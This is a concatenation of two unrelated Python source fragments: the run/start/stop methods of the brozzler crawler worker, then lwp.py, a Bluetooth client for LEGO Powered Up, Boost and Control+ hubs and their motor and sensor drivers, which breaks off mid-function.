due = False
if self._service_registry:
if not hasattr(self, "status_info"):
due = True
else:
d = doublethink.utcnow() - self.status_info["last_heartbeat"]
due = d.total_seconds() > self.HEARTBEAT_INTERVAL
if due:
self._service_heartbeat()
def run(self):
    '''
    Main worker loop: heartbeat to the service registry, pair each
    available browser with a claimed site, and spawn one brozzling
    thread per pair. On the way out, unregister from the registry and
    shut down all brozzling threads.
    '''
    self.logger.info("brozzler worker starting")
    try:
        latest_state = None
        while not self._shutdown.is_set():
            self._service_heartbeat_if_due()
            try:
                browser = self._browser_pool.acquire()
                try:
                    site = self._frontier.claim_site("%s:%s" % (
                        socket.gethostname(), browser.chrome.port))
                    th = threading.Thread(
                            target=self._brozzle_site_thread_target,
                            args=(browser, site),
                            name="BrozzlingThread:%s" % browser.chrome.port,
                            daemon=True)
                    with self._browsing_threads_lock:
                        self._browsing_threads.add(th)
                    th.start()
                except:
                    # site claim or thread start failed: return the
                    # browser to the pool before re-raising
                    self._browser_pool.release(browser)
                    raise
            except brozzler.browser.NoBrowsersAvailable:
                # log only on state change, to avoid spamming every 0.5s
                if latest_state != "browsers-busy":
                    self.logger.info(
                            "all %s browsers are busy", self._max_browsers)
                    latest_state = "browsers-busy"
            except brozzler.NothingToClaim:
                pass
            time.sleep(0.5)
        self.logger.info("shutdown requested")
    except r.ReqlError as e:
        self.logger.error(
                "caught rethinkdb exception, will try to proceed",
                exc_info=True)
    except brozzler.ShutdownRequested:
        self.logger.info("shutdown requested")
    except:
        self.logger.critical(
                "thread exiting due to unexpected exception",
                exc_info=True)
    finally:
        if self._service_registry and hasattr(self, "status_info"):
            try:
                self._service_registry.unregister(self.status_info["id"])
            except:
                self.logger.error(
                        "failed to unregister from service registry",
                        exc_info=True)
        self.logger.info(
                'shutting down %s brozzling threads',
                len(self._browsing_threads))
        with self._browsing_threads_lock:
            # ask each live brozzling thread to wind down
            for th in self._browsing_threads:
                if th.is_alive():
                    brozzler.thread_raise(th, brozzler.ShutdownRequested)
        self._browser_pool.shutdown_now()
        # copy to avoid "RuntimeError: Set changed size during iteration"
        thredz = set(self._browsing_threads)
        for th in thredz:
            th.join()
def start(self):
    '''Starts the worker thread; a second call is a logged no-op.'''
    with self._start_stop_lock:
        if self._thread:
            # Logger.warn is a deprecated alias; use warning()
            self.logger.warning(
                    'ignoring start request because self._thread is '
                    'not None')
            return
        self._thread = threading.Thread(
                target=self.run, name="BrozzlerWorker")
        self._thread.start()
def shutdown_now(self):
    # Alias for stop(); shutdown here is always the graceful signal.
    self.stop()
def stop(self):
    # Signal run() to exit its loop; run()'s finally block does the
    # actual teardown.
    self._shutdown.set()
def is_alive(self):
    '''
    Whether the worker thread is running. Returns None when start()
    was never called (preserving the original short-circuit value),
    otherwise a bool.
    '''
    if not self._thread:
        return self._thread
    return self._thread.is_alive()
|
lwp.py | import bleak
import asyncio
import traceback
import struct
import time
import threading
import atexit
import sys
# BLE GATT uuids for the LEGO Wireless Protocol (LWP) service and its
# single characteristic.
UART_UUID="00001623-1212-efde-1623-785feabcd123"
CHAR_UUID="00001624-1212-efde-1623-785feabcd123"
# LWP IO Type ID -> human-readable attached-device name.
LEGO_DEVICES={0x0001:"Motor",0x0002:"System Train Motor",0x0005:"Button",0x0008:"Light",0x0014:"Voltage",0x0015:"Current",0x0016:"Piezo Tone (Sound)",0x0017:"RGB Light",0x0022:"External Tilt Sensor",0x0023:"Motion Sensor",0x0025:"Vision Sensor",0x0026:"External Motor with Tacho",0x0027:"Internal Motor with Tacho",0x0028:"Internal Tilt",0x0029:"Duplo Train Motor",0x002A:"Duplo Train Speaker",0x002B:"Duplo Train Color",0x002C:"Duplo Train Speedometer",0x002E:"Technic Control+ Large Motor",0x002F:"Technic Control+ XL Motor",0x0036:"Powered Up Hub IMU Gesture",0x0037:"Remote Button",0x0038:"Remote Signal Level",0x0039:"Powered Up Hub IMU Accelerometer",0x003A:"Powered Up Hub IMU Gyro",0x003B:"Powered Up Hub IMU Position",0x003C:"Powered Up Hub IMU Temperature"}
# Port mode information request types (LWP "Port Mode Information Request").
PORT_INFO_TYPES={"NAME": 0,"VALUE FORMAT":0x80,"RAW Range":0x01,"PCT Range":0x02,"SI Range":0x03,"Symbol":0x04,"MAPPING": 0x05}
# Bit-index -> meaning for the mode input/output mapping bytes.
PORT_MODE_INFO_MAPPING_BITS=["NA","NA","Discrete","Relative","Absolute","NA","Supports Functional Mapping 2.0","Supports NULL"]
# Dataset value encodings, indexed by the "VALUE FORMAT" type byte.
PORT_MODE_INFO_DATASET_TYPES=["8b","16b","32b","float"]
# Bit flags in the port output command feedback byte (message 0x82).
PORT_OUTPUT_FEEDBACK={0x01:"Buffer Empty + Command In Progress",0x02:"Buffer Empty + Command Completed",0x04:"Current Command(s) Discarded",0x08:"Idle",0x10:"Busy/Full"}
# Preset palette for the hub RGB status LED, indexed by color code.
RGB_LED_COLORS=["off","magenta","purple","blue","cyan","turquoise","green","yellow","orange","red","white"]
# End-state codes for motor commands (what to do when movement finishes).
MOTOR_END_STATE={"float":0,"hold":1,"brake":2}
# Vision sensor raw color code -> color name.
VISION_SENSOR_COLOR_DECODE={0:"black",3:"blue",5:"green",7:"yellow",9:"red",10:"white",255:"UNKNOWN"}
# Vision sensor mode names, indexed by mode number.
VISION_SENSOR_MODES=["basic_color","proximity","count","reflect","ambience","color_o","rgb_color"]
# Axis labels for the IMU gyro and accelerometer value triples.
GYRO_SENSOR_VALUES=["roll","pitch","yaw"]
ACCELEROMETER_SENSOR_VALUES=["x","z","y"]
class Hub:
    """Base class for LEGO Wireless Protocol (LWP) hubs over BLE.

    A single asyncio loop (started by Hub.run) owns all bleak BLE I/O;
    worker threads talk to it through two class-level queues keyed by a
    monotonically increasing request id:
      _ol: pending requests [op, args, kwargs] where op is
           0=discover, 1=connect, 2=start_notify, 3=write_gatt_char
      _il: completed results, popped by the waiting thread
    _hc maps BLE manufacturer id -> Hub subclass (auto-registered),
    _hl lists every connected hub (for shutdown) and _br is the BLE
    loop's stop flag.
    """
    _hc = {}
    _il = {}
    _ol = {}
    _hl = []
    _id = 0
    _br = False

    def __init_subclass__(cls):
        # auto-register each concrete hub type by its manufacturer id
        Hub._hc[cls._m_id] = cls

    @staticmethod
    def run(f, *a, **kw):
        """Run user function `f(*a, **kw)` in a worker thread while
        this thread drives the BLE event loop; exits the process when
        `f` returns (status 0) or raises (status 1)."""
        lp = asyncio.get_event_loop()

        def _end(es=0):
            # disconnect all hubs, stop the BLE loop, exit with status es
            for h in Hub._hl:
                h.disconnect()
            time.sleep(0.2)
            Hub._br = True
            while (lp.is_running() == True):
                pass
            lp.stop()
            lp.close()
            sys.exit(es)

        def _run(f, a, kw):
            try:
                f(*a, **kw)
                _end(es=0)
            except Exception as e:
                traceback.print_exception(None, e, e.__traceback__)
                _end(es=1)

        thr = threading.Thread(target=_run, args=(f, a, kw), kwargs={})
        thr.start()

        async def _loop():
            # serve queued BLE requests until asked to stop
            try:
                while (Hub._br == False):
                    while (len(Hub._ol.keys()) == 0):
                        if (Hub._br == True):
                            return
                        await asyncio.sleep(0.001)
                    id_ = list(Hub._ol.keys())[0]
                    t, a, kw = Hub._ol.pop(id_)
                    if (t == 0):
                        kw["loop"] = asyncio.get_event_loop()
                        Hub._il[id_] = await bleak.discover(*a, **kw)
                    elif (t == 1):
                        kw["loop"] = asyncio.get_event_loop()
                        dv = bleak.BleakClient(*a, **kw)
                        await dv.connect()
                        Hub._il[id_] = dv
                    elif (t == 2):
                        await a[0].start_notify(CHAR_UUID, *a[1:], **kw)
                    elif (t == 3):
                        await a[0].write_gatt_char(CHAR_UUID, *a[1:], **kw)
                    else:
                        print(f"UNKNOWN: {id_} => [{t},{a},{kw}]")
            except Exception as e:
                traceback.print_exception(None, e, e.__traceback__)
                _end()

        atexit.register(_end)
        asyncio.run(_loop())

    @staticmethod
    def find(cfl=[], i=5, t=None, cb=lambda *a, **kw: None):
        """Scan for hubs (up to `i` one-second scans), connect each
        matching one (class `t`, or any registered type) and call `cb`
        per hub found. With a configuration list `cfl` (dicts of port
        -> expected driver class) returns one list of conforming hubs
        per configuration; otherwise returns the list of hubs found.
        NOTE: the mutable default `cfl=[]` is never mutated here.
        """
        hl = []
        al = []  # addresses already connected
        while (i > 0 and len(hl) == 0):
            dl = Hub._wait([0, [], {"timeout": 1}])
            # keep only devices advertising the LWP service uuid
            dl = [d for d in dl if UART_UUID in d.metadata["uuids"]]
            for d in dl:
                # manufacturer data byte 1 carries the hub type id
                dt = list(d.metadata["manufacturer_data"].values())[0]
                if (d.address not in al):
                    if (t is None):
                        for m_id in Hub._hc.keys():
                            if (dt[1] == m_id):
                                print(d.address)
                                dc = Hub._wait([1, [], {"address": d.address}])
                                h = Hub._hc[m_id](dc)
                                h._init()
                                hl += [h]
                                al += [d.address]
                                cb(h)
                                break
                    else:
                        if (dt[1] == t._m_id):
                            print(d.address)
                            dc = Hub._wait([1, [], {"address": d.address}])
                            h = t(dc)
                            h._init()
                            hl += [h]
                            al += [d.address]
                            cb(h)
                            break
            i -= 1
        if (len(cfl) == 0):
            return hl
        # filter hubs by requested port layout; matching ports get setup()
        o = []
        for cf in cfl:
            o += [[]]
            for h in hl:
                pl = h.get_port(list(cf.keys()))
                ok = True
                for i in range(0, len(pl)):
                    if (pl[i]._id != list(cf.values())[i]._id):
                        ok = False
                        break
                    else:
                        pl[i].setup()
                if (ok == True):
                    o[-1] += [h]
        return o

    @staticmethod
    def _wait(dt, w=True, r=True):
        """Queue request `dt` for the BLE loop; optionally busy-wait
        until it is taken (`w`) and until its result arrives (`r`)."""
        id_ = Hub._id + 0
        Hub._ol[id_] = dt
        Hub._id += 1
        if (w == False):
            return None
        while (id_ in Hub._ol.keys()):
            pass
        if (r == False):
            return None
        while (id_ not in Hub._il.keys()):
            pass
        return Hub._il.pop(id_)

    def __init__(self, d, nm):
        self.d = d             # connected BleakClient
        # NOTE(review): instance _ol shadows the class-level queue and
        # appears unused on instances — confirm before removing
        self._ol = []
        self._port_dt = {}     # port number -> attachment/mode info
        self._dl = {}          # port number -> driver instance
        self.name = nm
        Hub._hl += [self]

    def connections(self):
        """Print the attached-device name for every known port."""
        for p in list(self._port_dt.keys()):
            print(f"{p} => {self._port_dt[p]['name']}")
        return None

    def get_port(self, pl, wait=True):
        """Return driver objects for port number(s), a "a,b" string or
        "all"; busy-waits until each port has attached (when `wait`)."""
        all_ = False
        if (type(pl) == int):
            pl = [pl]
        if (type(pl) == str):
            if (pl == "all"):
                all_ = True
                pl = [*self._port_dt.keys()]
            else:
                pl = pl.split(",")
        for p in pl:
            while (wait == True and (p not in self._port_dt.keys() or "_ready" not in self._port_dt[p].keys() or self._port_dt[p]["_ready"] == False)):
                pass
        if (all_ == True and len(pl) != len(self._port_dt.keys())):
            # more ports attached while we waited; redo with the full set
            return self.get_port("all", wait=wait)
        return [self._port_dt[p]["driver"] for p in pl]

    def get_port_modes(self, pl, wait=True):
        """Like get_port() but returns each port's mode-info dict."""
        all_ = False
        if (type(pl) == int):
            pl = [pl]
        if (type(pl) == str):
            if (pl == "all"):
                all_ = True
                pl = [*self._port_dt.keys()]
            else:
                pl = pl.split(",")
        for p in pl:
            while (wait == True and (p not in self._port_dt.keys() or "_modes_ready" not in self._port_dt[p].keys() or self._port_dt[p]["_modes_ready"] == False)):
                pass
        if (all_ == True and len(pl) != len(self._port_dt.keys())):
            # BUGFIX: recurse into get_port_modes (not get_port) so the
            # caller gets mode dicts, not driver objects
            return self.get_port_modes("all", wait=wait)
        return [self._port_dt[p]["modes"] for p in pl]

    def wait_until_data(self, pl):
        """Busy-wait until every requested port's driver has reported
        at least one value notification."""
        all_ = False
        if (type(pl) == int):
            pl = [pl]
        if (type(pl) == str):
            if (pl == "all"):
                all_ = True
                pl = [*self._port_dt.keys()]
            else:
                pl = pl.split(",")
        self.get_port(pl, wait=True)
        for p in pl:
            while ((self._port_dt[p]["driver"]._dt == False)):
                pass
            if (all_ == True and len(pl) != len(self._port_dt.keys())):
                # BUGFIX: was `self.get_port("all", wait=wait)` which
                # raised NameError (`wait` undefined here); redo the
                # data wait over the now-complete port set instead
                self.wait_until_data("all")
                break

    def disconnect(self):
        """Ask the hub to switch off / disconnect (fire and forget)."""
        self._send([0x00, 0x02, 0x01], wait=False)

    def _init(self):
        # subscribe to LWP notifications; each message is parsed on its
        # own thread so the BLE loop is never blocked
        def _msg(s, dt):
            thr = threading.Thread(target=self._msg, args=(s, dt), kwargs={})
            thr.start()
        Hub._wait([2, [self.d, _msg], {}], r=False)

    def _send(self, dt, wait=True):
        # prepend the LWP length byte and write to the characteristic
        Hub._wait([3, [self.d, bytearray([len(dt) + 1] + dt)], {}], w=wait, r=False)

    def _msg(self, s, dt):
        """Parse one LWP downstream (hub -> host) message."""
        try:
            dt = list(dt)[2:]      # strip length and hub-id bytes
            t, dt = dt[0], dt[1:]  # message type byte
            if (t == 0x02):
                pass               # hub action ack - ignored
            elif (t == 0x04):
                # hub attached I/O: attach/detach events per port
                p, e, dt = dt[0], dt[1], dt[2:]
                if (e != 0):
                    id_, dt = dt[0], dt[2:]
                    if (p not in self._port_dt.keys()):
                        self._port_dt[p] = {}
                        self._port_dt[p]["_ready"] = False
                    self._port_dt[p]["id"] = id_
                    self._port_dt[p]["name"] = (LEGO_DEVICES[id_] if id_ in LEGO_DEVICES.keys() else f"UNKNOWN #{p}")
                    if (e == 2):
                        # virtual (paired) port built from ports p0, p1
                        p0, p1 = dt
                        self._port_dt[p]["virtual"] = (p0, p1)
                        print("VIRTUAL", p, p0, p1)
                    self._port_dt[p]["driver"] = HubDriver.get(id_)(self, p)
                    self._dl[p] = self._port_dt[p]["driver"]
                    self._port_dt[p]["_ready"] = True
            elif (t == 0x05):
                # generic error message: command type + error code
                ct, ec = dt
                if (ec == 1):
                    print(f"ERROR: {hex(ct)} => ACK")
                elif (ec == 2):
                    print(f"ERROR: {hex(ct)} => MACK")
                elif (ec == 3):
                    print(f"ERROR: {hex(ct)} => Buffer Overflow")
                elif (ec == 4):
                    print(f"ERROR: {hex(ct)} => Timeout")
                elif (ec == 5):
                    print(f"ERROR: {hex(ct)} => Command Not Recognised")
                elif (ec == 6):
                    print(f"ERROR: {hex(ct)} => Invalid Use")
                elif (ec == 7):
                    print(f"ERROR: {hex(ct)} => Overcurrent")
                elif (ec == 8):
                    print(f"ERROR: {hex(ct)} => Internal Error")
            elif (t == 0x43):
                # port information: capabilities (m==1) or combinations
                p, m, dt = dt[0], dt[1], dt[2:]
                if ("modes" not in self._port_dt[p].keys()):
                    self._port_dt[p]["modes"] = {}
                    self._port_dt[p]["_modes_ql"] = 0  # outstanding info requests
                    self._port_dt[p]["_modes_ready"] = False
                if (m == 1):
                    cl, im, om, dt = dt[0], dt[2] + dt[3] * 256, dt[4] + dt[5] * 256, dt[6:]
                    i = 0
                    for a in ["output", "input", "combinable", "synchronizable"]:
                        self._port_dt[p][a] = cl & 1 << i
                        i += 1
                    for i in range(0, 16):
                        if (im & (1 << i)):
                            if (i not in self._port_dt[p]["modes"].keys()):
                                self._port_dt[p]["modes"][i] = {}
                            self._port_dt[p]["modes"][i]["input"] = True
                        if (om & (1 << i)):
                            if (i not in self._port_dt[p]["modes"].keys()):
                                self._port_dt[p]["modes"][i] = {}
                            self._port_dt[p]["modes"][i]["output"] = True
                    # NOTE(review): "combinable" holds bit value 4 when
                    # set (bit 2 of cl), so this == 1 test never fires
                    # and mode combinations are never requested; confirm
                    # intent before changing
                    if (self._port_dt[p]["combinable"] == 1):
                        self._send([0x00, 0x21, p, 0x02], wait=False)
                        self._port_dt[p]["_modes_ql"] += 1
                    for m in self._port_dt[p]["modes"].keys():
                        for v in PORT_INFO_TYPES.values():
                            self._send([0x00, 0x22, p, m, v], wait=False)
                            self._port_dt[p]["_modes_ql"] += 1
                    if (self._port_dt[p]["_modes_ql"] == 0):
                        self._port_dt[p]["_modes_ready"] = True
                else:
                    # possible mode combinations reply (16-bit bitmasks)
                    self._port_dt[p]["mode_combinations"] = []
                    if (len(dt) > 0):
                        mc, dt = dt[0] + dt[1] * 256, dt[2:]
                        while (mc != 0):
                            cml = []
                            for i in range(16):
                                if (mc & (1 << i)):
                                    cml += [i]
                            self._port_dt[p]["mode_combinations"] += [cml]
                            if (len(dt) == 0):
                                break
                            else:
                                mc, dt = dt[0] + dt[1] * 256, dt[2:]
                    self._port_dt[p]["_modes_ql"] -= 1
                    if (self._port_dt[p]["_modes_ql"] == 0):
                        self._port_dt[p]["_modes_ready"] = True
            elif (t == 0x44):
                # port mode information reply; mt selects the info kind
                p, m, mt, dt = dt[0], dt[1], dt[2], dt[3:]
                if (mt == 0):
                    self._port_dt[p]["modes"][m]["name"] = "".join([chr(b) for b in dt if b != 0])
                elif (mt == 1):
                    self._port_dt[p]["modes"][m]["raw_range"] = {"min": struct.unpack("<f", bytearray(dt[0:4]))[0], "max": struct.unpack("<f", bytearray(dt[4:]))[0]}
                elif (mt == 2):
                    self._port_dt[p]["modes"][m]["pct_range"] = {"min": struct.unpack("<f", bytearray(dt[0:4]))[0], "max": struct.unpack("<f", bytearray(dt[4:]))[0]}
                elif (mt == 3):
                    self._port_dt[p]["modes"][m]["si_range"] = {"min": struct.unpack("<f", bytearray(dt[0:4]))[0], "max": struct.unpack("<f", bytearray(dt[4:]))[0]}
                elif (mt == 4):
                    self._port_dt[p]["modes"][m]["symbol"] = "".join([chr(b) for b in dt if b != 0])
                elif (mt == 5):
                    self._port_dt[p]["modes"][m]["input_mapping"] = [PORT_MODE_INFO_MAPPING_BITS[i] for i in range(8) if (dt[0] >> i) & 1]
                    self._port_dt[p]["modes"][m]["output_mapping"] = [PORT_MODE_INFO_MAPPING_BITS[i] for i in range(8) if (dt[1] >> i) & 1]
                elif (mt == 128):
                    self._port_dt[p]["modes"][m]["datasets"] = dt[0]
                    self._port_dt[p]["modes"][m]["dataset_type"] = PORT_MODE_INFO_DATASET_TYPES[dt[1]]
                    self._port_dt[p]["modes"][m]["dataset_total_figures"] = dt[2]
                    self._port_dt[p]["modes"][m]["dataset_decimals"] = dt[3]
                else:
                    print(mt)
                self._port_dt[p]["_modes_ql"] -= 1
                if (self._port_dt[p]["_modes_ql"] == 0):
                    self._port_dt[p]["_modes_ready"] = True
            elif (t == 0x45 or t == 0x46):
                # port value (single / combined): hand off to the driver
                p, dt = dt[0], dt[1:]
                self._port_dt[p]["driver"]._parse_caps(dt)
            elif (t == 0x47 or t == 0x48):
                pass               # input format acks - ignored
            elif (t == 0x82):
                # port output command feedback: (port, flags) byte pairs
                for i in range(0, len(dt), 2):
                    l = []
                    j = 0
                    for s in PORT_OUTPUT_FEEDBACK.keys():
                        if (dt[i + 1] & 1 << j > 0):
                            l += [s]
                        j += 1
                    self._port_dt[dt[i]]["driver"].feedback += l
                    # print(f"FEEDBACK: port#{dt[i]} => {[PORT_OUTPUT_FEEDBACK[e] for e in l]}")
            else:
                print(hex(t))
        except Exception as e:
            traceback.print_exception(None, e, e.__traceback__)
class HubDriver:
    """Base class / fallback driver for a device attached to a hub port.

    Subclasses register themselves by LWP device id via
    __init_subclass__, and HubDriver.get() falls back to this generic
    class for unknown ids. Capability tuples used throughout are
    (mode, value-name, notify-delta, dataset-count, bytes-per-dataset).
    """
    _dl = {}

    @staticmethod
    def get(id_):
        """Driver class registered for device id `id_` (or HubDriver)."""
        if (id_ in HubDriver._dl.keys()):
            return HubDriver._dl[id_]
        return HubDriver

    def __init__(self, h, p, _id=-1):
        self.h = h              # owning Hub
        self.p = p              # port number on the hub
        self.feedback = [0x08]  # output-command feedback codes (0x08 = idle)
        self._id = _id          # LWP device id (-1 for the generic driver)
        self._cl = []           # configured capability tuples
        self._dt = False        # True once a value notification arrived

    def __init_subclass__(cls):
        HubDriver._dl[cls._id] = cls

    def name(self):
        """Human-readable name of whatever is attached to this port."""
        return LEGO_DEVICES[self.h._port_dt[self.p]["id"]]

    def setup(self):
        """Request mode info and (re)apply the capability setup."""
        self.h._send([0x00, 0x21, self.p, 0x01], wait=True)
        self._setup_caps()

    def _setup_caps_wr(self, cl):
        # record desired capability tuples; applied by _setup_caps()
        self._cl = cl

    def _setup_caps(self):
        self.value = None
        if (len(self._cl) == 0):
            pass
        elif (len(self._cl) == 1):
            # single mode: plain port input format setup
            self.value = {}
            self.h._send([0x00, 0x41, self.p, self._cl[0][0], self._cl[0][2], 0, 0, 0, 1])
        else:
            # several modes: lock the port and set up a mode/dataset combi
            self.value = {}
            self.h._send([0x00, 0x42, self.p, 0x02])
            for i in range(0, len(self._cl)):
                self.h._send([0x00, 0x41, self.p, self._cl[i][0], self._cl[i][2], 0, 0, 0, 1])
            b = []
            for i in range(0, len(self._cl)):
                for j in range(self._cl[i][3]):
                    b += [16 * self._cl[i][0] + j]
            self.h._send([0x00, 0x42, self.p, 0x01, 0] + b)
            self.h._send([0x00, 0x42, self.p, 0x03])

    def _parse_caps(self, dt):
        """Decode a port value notification into self.value, then let
        the subclass post-process via _parse_value()."""
        if (len(self._cl) == 0):
            self.value = dt
        elif (len(self._cl) == 1):
            for i in range(0, self._cl[0][3]):
                if (self._cl[0][3] == 1):
                    self.value[self._cl[0][1]] = self._to_int(dt[i * self._cl[0][4]:(i + 1) * self._cl[0][4]], self._cl[0][4])
                else:
                    if (self._cl[0][1] not in self.value):
                        self.value[self._cl[0][1]] = {}
                    self.value[self._cl[0][1]][i] = self._to_int(dt[i * self._cl[0][4]:(i + 1) * self._cl[0][4]], self._cl[0][4])
        else:
            # combined mode: a bitmask says which datasets are present
            m, dt = dt[1], dt[2:]
            i = 0
            for j in range(0, len(self._cl)):
                for k in range(0, self._cl[j][3]):
                    if (m & (1 << i)):
                        if (self._cl[j][3] == 1):
                            self.value[self._cl[j][1]], dt = self._to_int(dt[0:self._cl[j][4]], self._cl[j][4]), dt[self._cl[j][4]:]
                        else:
                            if (self._cl[j][1] not in self.value):
                                self.value[self._cl[j][1]] = {}
                            # BUGFIX: _to_int() requires the width arg;
                            # it was missing here and raised TypeError
                            self.value[self._cl[j][1]][k], dt = self._to_int(dt[0:self._cl[j][4]], self._cl[j][4]), dt[self._cl[j][4]:]
                    i += 1
            if (len(dt) > 0):
                print("EXTRA: " + str(dt))
        self._parse_value()
        self._dt = True

    def _to_int(self, dt, l):
        """Little-endian unsigned int from `l` bytes (1, 2 or 4);
        returns None for unsupported widths."""
        if (l == 1):
            return dt[0]
        if (l == 2):
            return struct.unpack("<H", bytearray(dt))[0]
        if (l == 4):
            return struct.unpack("<I", bytearray(dt))[0]
        return None
class PoweredUpHub(Hub):
    """Powered Up smart hub (advertises as "HUB NO.4")."""
    _m_id = 0x41
    _name = "HUB NO.4"

    @staticmethod
    def find(*a, **kw):
        """Discover only hubs of this type."""
        return Hub.find(*a, **dict(kw, t=PoweredUpHub))

    def __init__(self, d):
        super().__init__(d, type(self)._name)
class PoweredUpRemote(Hub):
    """Powered Up remote control handset."""
    _m_id = 0x42
    _name = "Handset"

    @staticmethod
    def find(*a, **kw):
        """Discover only remotes of this type."""
        return Hub.find(*a, **dict(kw, t=PoweredUpRemote))

    def __init__(self, d):
        super().__init__(d, type(self)._name)
class BoostHub(Hub):
    """Boost Move Hub."""
    _m_id = 0x40
    _name = "LEGO Move Hub"

    @staticmethod
    def find(*a, **kw):
        """Discover only Boost hubs."""
        return Hub.find(*a, **dict(kw, t=BoostHub))

    def __init__(self, d):
        super().__init__(d, type(self)._name)
class DuploTrainHub(Hub):
    """Duplo train base hub."""
    _m_id = 0x20
    _name = "Train Base"

    @staticmethod
    def find(*a, **kw):
        """Discover only Duplo train hubs."""
        return Hub.find(*a, **dict(kw, t=DuploTrainHub))

    def __init__(self, d):
        super().__init__(d, type(self)._name)
class CPlusHub(Hub):
    """Technic Control+ hub."""
    _m_id = 0x80
    _name = "Control+ Hub"

    @staticmethod
    def find(*a, **kw):
        """Discover only Control+ hubs."""
        return Hub.find(*a, **dict(kw, t=CPlusHub))

    def __init__(self, d):
        super().__init__(d, type(self)._name)
class LargeMotor(HubDriver):
    """Technic Control+ large motor (tacho: speed + absolute position)."""
    _id = 0x2e

    def __init__(self, h, p):
        super().__init__(h, p, type(self)._id)
        # caps: (mode, name, notify-delta, dataset-count, bytes/dataset)
        self._setup_caps_wr([(1, "speed", 1, 1, 1), (2, "pos", 1, 1, 4)])
        self._w_r = False  # waiting-for-resistance flag

    def _parse_value(self):
        # While waiting for resistance, stop the motor once it stalls
        # (reported speed drops to <= 2).
        if self._w_r == True:
            if self.value["speed"] <= 2:
                self._w_r = False
                self.h._send([0x00, 0x81, self.p, 0x11, 0x51, 0, 0])

    def _to_bytes(self, sp):
        # Clamp to 100 and two's-complement negative speeds into a byte.
        if sp > 100:
            return 100
        return sp & 255 if sp < 0 else sp

    def set_pos(self, ps, sp, m_pw=50, e_st=1):
        """Go to absolute position `ps` (degrees) at speed `sp`."""
        end = 0 if e_st == 0 else (126 if e_st == 1 else 127)
        cmd = [0x00, 0x81, self.p, 0x11, 0x0d]
        cmd += list(struct.pack("i", ps))
        cmd += [self._to_bytes(sp), m_pw, end, 3]
        self.h._send(cmd)

    def rotate(self, d, sp, m_pw=50, e_st=1, adp=0b00):
        """Rotate `d` degrees relative to current position at speed `sp`."""
        end = 0 if e_st == 0 else (126 if e_st == 1 else 127)
        cmd = [0x00, 0x81, self.p, 0x11, 0x0b]
        cmd += list(struct.pack("i", d))
        cmd += [self._to_bytes(sp), m_pw, end, adp]
        self.h._send(cmd, wait=False)

    def set_speed(self, sp):
        """Run continuously at speed `sp`."""
        self.h._send([0x00, 0x81, self.p, 0x11, 0x51, 0, self._to_bytes(sp)], wait=True)

    def wait_until_resistance(self):
        """Busy-wait until the motor stalls (see _parse_value)."""
        self._w_r = True
        while self._w_r == True:
            pass
class XLMotor(HubDriver):
    """Technic Control+ XL motor (tacho: speed + absolute position)."""
    _id = 0x2f

    def __init__(self, h, p):
        super().__init__(h, p, type(self)._id)
        # caps: (mode, name, notify-delta, dataset-count, bytes/dataset)
        self._setup_caps_wr([(1, "speed", 1, 1, 1), (2, "pos", 1, 1, 4)])
        self._w_r = False  # waiting-for-resistance flag

    def _parse_value(self):
        # While waiting for resistance, stop the motor once it stalls
        # (reported speed drops to <= 2).
        if self._w_r == True:
            if self.value["speed"] <= 2:
                self._w_r = False
                self.h._send([0x00, 0x81, self.p, 0x11, 0x51, 0, 0])

    def _to_bytes(self, sp):
        # Clamp to 100 and two's-complement negative speeds into a byte.
        if sp > 100:
            return 100
        return sp & 255 if sp < 0 else sp

    def set_pos(self, ps, sp, m_pw=50, e_st=1):
        """Go to absolute position `ps` (degrees) at speed `sp`."""
        end = 0 if e_st == 0 else (126 if e_st == 1 else 127)
        cmd = [0x00, 0x81, self.p, 0x11, 0x0d]
        cmd += list(struct.pack("i", ps))
        cmd += [self._to_bytes(sp), m_pw, end, 3]
        self.h._send(cmd)

    def rotate(self, d, sp, m_pw=50, e_st=1):
        """Rotate `d` degrees relative to current position at speed `sp`."""
        end = 0 if e_st == 0 else (126 if e_st == 1 else 127)
        cmd = [0x00, 0x81, self.p, 0x11, 0x0b]
        cmd += list(struct.pack("i", d))
        cmd += [self._to_bytes(sp), m_pw, end, 0]
        self.h._send(cmd, wait=False)

    def set_speed(self, sp):
        """Run continuously at speed `sp`."""
        self.h._send([0x00, 0x81, self.p, 0x11, 0x51, 0, self._to_bytes(sp)], wait=True)

    def wait_until_resistance(self):
        """Busy-wait until the motor stalls (see _parse_value)."""
        self._w_r = True
        while self._w_r == True:
            pass
class ExternalTachoMotor(HubDriver):
    """External motor with tacho (speed + absolute position)."""
    _id = 0x26

    def __init__(self, h, p):
        super().__init__(h, p, type(self)._id)
        # caps: (mode, name, notify-delta, dataset-count, bytes/dataset)
        self._setup_caps_wr([(1, "speed", 1, 1, 1), (2, "pos", 1, 1, 4)])
        self._w_r = False  # waiting-for-resistance flag

    def _parse_value(self):
        # While waiting for resistance, stop the motor once it stalls
        # (reported speed drops to <= 2).
        if self._w_r == True:
            if self.value["speed"] <= 2:
                self._w_r = False
                self.h._send([0x00, 0x81, self.p, 0x11, 0x51, 0, 0])

    def _to_bytes(self, sp):
        # Clamp to 100 and two's-complement negative speeds into a byte.
        if sp > 100:
            return 100
        return sp & 255 if sp < 0 else sp

    def set_pos(self, ps, sp, m_pw=50, e_st=1):
        """Go to absolute position `ps` (degrees) at speed `sp`."""
        end = 0 if e_st == 0 else (126 if e_st == 1 else 127)
        cmd = [0x00, 0x81, self.p, 0x11, 0x0d]
        cmd += list(struct.pack("i", ps))
        cmd += [self._to_bytes(sp), m_pw, end, 3]
        self.h._send(cmd)

    def rotate(self, d, sp, m_pw=50, e_st=1):
        """Rotate `d` degrees relative to current position at speed `sp`.
        (Unlike the Control+ motors, this send waits for the queue.)"""
        end = 0 if e_st == 0 else (126 if e_st == 1 else 127)
        cmd = [0x00, 0x81, self.p, 0x11, 0x0b]
        cmd += list(struct.pack("i", d))
        cmd += [self._to_bytes(sp), m_pw, end, 3]
        self.h._send(cmd)

    def set_speed(self, sp):
        """Run continuously at speed `sp`."""
        self.h._send([0x00, 0x81, self.p, 0x11, 0x51, 0, self._to_bytes(sp)])

    def wait_until_resistance(self):
        """Busy-wait until the motor stalls (see _parse_value)."""
        self._w_r = True
        while self._w_r == True:
            pass
class VisionSensor(HubDriver):
    """Boost vision sensor: color/proximity/count/reflect/ambience/RGB."""
    _id = 0x25

    def __init__(self, h, p):
        super().__init__(h, p, type(self)._id)
        self._md = 0  # current mode index into VISION_SENSOR_MODES
        self._setup_caps_wr([(0, "basic_color", 1, 1, 1)])

    def _parse_value(self):
        # Decode raw color code / raw RGB triple into friendly values.
        v = self.value
        if "basic_color" in v:
